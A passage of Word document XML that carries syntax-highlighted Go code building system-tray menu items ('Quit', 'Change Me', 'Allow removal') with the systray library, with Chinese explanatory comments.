          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>添加点击托盘菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mQuitOrig </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Quit"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Quit the whole app"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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lastRenderedPageBreak/>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>开启一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> goroutiue </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>即可，故此处注释，但是此处会影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mQuitOrig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>的具体行为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//go func() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>&lt;-mQuitOrig.ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("Requesting quit")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>systray.Quit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>fmt.Println("Finished quitting")</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>//}()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>// We can manipulate the systray in other goroutines</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>go func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>【添加一级菜单内容】</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>暂不清楚</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray.AddMenuItem()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>tooltip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>有何效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mChange </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Change Me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Change Me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">mAllowRemoval </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>AddMenuItem</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"Allow removal"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"macOS only: allow removal of the icon when cmd is pressed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>可勾选的一级菜单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
